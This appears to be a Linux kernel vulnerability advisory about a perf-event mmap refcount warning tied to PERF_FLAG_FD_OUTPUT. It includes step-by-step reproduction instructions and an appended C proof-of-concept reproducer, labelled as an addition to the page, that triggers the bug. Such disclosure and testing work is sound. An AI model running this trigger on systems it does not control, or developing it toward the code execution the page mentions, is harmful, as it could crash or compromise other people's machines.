Linux kernel
cpe:2.3:a:linux:linux_kernel:*:*:*:*:*:*:*, +4 more
A vulnerability in the Linux kernel's perf event handling has been addressed. The issue was a refcount warning triggered when incrementing the mmap_count of a perf event: the increment was applied to a count that was already zero, which the kernel's refcount_t sanity checks report as "addition on 0; use-after-free". The problem arose when a group member event was created with the PERF_FLAG_FD_OUTPUT flag, which redirects the new event's sampled output into the ring buffer of the group leader passed as group_fd. The group leader is expected to be mapped into memory before the member event, but the pre-fix handling allowed the member to be mapped while its own mmap_count was still zero even though it already referenced the shared ring buffer, producing the warning. The vulnerability could potentially be exploited by creating a specific sequence of perf events and manipulating their memory mappings, causing events that share an output buffer to interfere with each other by overwriting shared user pages.
Successful exploitation could result in a use-after-free condition, in which memory that has already been freed is accessed again; depending on what the freed memory is reused for, this could cause memory corruption and, in the worst case, allow arbitrary code execution.
To reproduce this vulnerability, first open a perf event with default attributes and mmap its ring buffer. Then open a second perf event with the PERF_FLAG_FD_OUTPUT flag, passing the first event's file descriptor as group_fd, so that it becomes a group member whose output is redirected into the leader's ring buffer. Finally, mmap the second event with the same buffer size as the leader (perf_mmap rejects a mismatched data page count). On an unpatched kernel this sequence triggers the refcount warning in the kernel log, indicating that the vulnerability has been successfully reproduced.
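The sequence above as a runnable C reproducer. This is an added example, not code from the page or from the kernel tree. It assumes software clock events for both descriptors (the page says "default attributes"; the trigger is the mapping order, not the event type) and a two-page mapping (one user page plus one data page) for both events. The function names and return codes are this example's own.

```c
/* Added reproducer for the PERF_FLAG_FD_OUTPUT mmap sequence described above.
 * Not the page's or the kernel's code; event type and buffer size are assumptions. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <linux/perf_event.h>

/* Prototype for syscall(2), in case the translation unit is built in strict ISO mode. */
extern long syscall(long number, ...);

/* Step outcomes. Only REPRO_SEQUENCE_DONE means the full leader-mmap / member-open /
 * member-mmap sequence ran; the kernel log then shows whether the refcount warning
 * fired on this kernel. The other codes name the step at which the run stopped. */
enum repro_result {
    REPRO_SEQUENCE_DONE       =  0,
    REPRO_LEADER_OPEN_FAILED  = -1,
    REPRO_LEADER_MMAP_FAILED  = -2,
    REPRO_MEMBER_OPEN_FAILED  = -3,
    REPRO_MEMBER_MMAP_FAILED  = -4,
};

int repro_errno;   /* errno of the failing step, for diagnostics */

static long perf_event_open(struct perf_event_attr *attr, pid_t pid, int cpu,
                            int group_fd, unsigned long flags)
{
    return syscall(__NR_perf_event_open, attr, pid, cpu, group_fd, flags);
}

/* A software clock event is used for both events so the sequence needs no hardware
 * PMU access (assumption: the page says "default attributes"). exclude_kernel keeps
 * the open permitted for unprivileged users under perf_event_paranoid=1 or 2. */
void fill_attr(struct perf_event_attr *attr)
{
    memset(attr, 0, sizeof(*attr));
    attr->type = PERF_TYPE_SOFTWARE;
    attr->size = sizeof(*attr);
    attr->config = PERF_COUNT_SW_CPU_CLOCK;
    attr->sample_period = 1;
    attr->disabled = 1;
    attr->exclude_kernel = 1;
}

/* perf_mmap() accepts one user page followed by a power-of-two number of data pages,
 * and a member sharing the leader's buffer must request the same data page count. */
size_t mmap_len_for_data_pages(size_t data_pages)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    return (1 + data_pages) * page;
}

int run_fd_output_mmap_sequence(void)
{
    struct perf_event_attr attr;
    size_t len = mmap_len_for_data_pages(1);
    int leader, member, result = REPRO_SEQUENCE_DONE;
    void *leader_map, *member_map;

    /* Step 1: open the future group leader and map its ring buffer first. */
    fill_attr(&attr);
    leader = (int)perf_event_open(&attr, 0, -1, -1, 0);
    if (leader < 0) {
        repro_errno = errno;
        return REPRO_LEADER_OPEN_FAILED;
    }
    leader_map = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_SHARED, leader, 0);
    if (leader_map == MAP_FAILED) {
        repro_errno = errno;
        close(leader);
        return REPRO_LEADER_MMAP_FAILED;
    }

    /* Step 2: open a member of that group whose output is redirected into the
     * leader's ring buffer (PERF_FLAG_FD_OUTPUT with group_fd = leader). */
    fill_attr(&attr);
    member = (int)perf_event_open(&attr, 0, -1, leader, PERF_FLAG_FD_OUTPUT);
    if (member < 0) {
        repro_errno = errno;
        result = REPRO_MEMBER_OPEN_FAILED;
        goto out_leader;
    }

    /* Step 3: map the member. It already references the shared buffer although it
     * has never been mapped itself, which is the state the page describes. */
    member_map = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_SHARED, member, 0);
    if (member_map == MAP_FAILED) {
        repro_errno = errno;
        result = REPRO_MEMBER_MMAP_FAILED;
    } else {
        munmap(member_map, len);
    }
    close(member);
out_leader:
    munmap(leader_map, len);
    close(leader);
    return result;
}

int main(void)
{
    int r = run_fd_output_mmap_sequence();
    if (r == REPRO_SEQUENCE_DONE)
        printf("sequence completed; check the kernel log for a refcount_t warning\n");
    else
        printf("stopped at step %d: %s\n", -r, strerror(repro_errno));
    return 0;
}
```

Build with gcc and run as an unprivileged user on a kernel whose perf_event_paranoid setting permits software events. The warning, if the kernel is unpatched, goes to the kernel log rather than to the process, so inspect dmesg after the run; a patched kernel completes the same sequence without the warning, and a non-zero return code identifies the step at which the environment refused the open or the mapping.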
Users should upgrade to a Linux kernel release that includes the fix for this issue.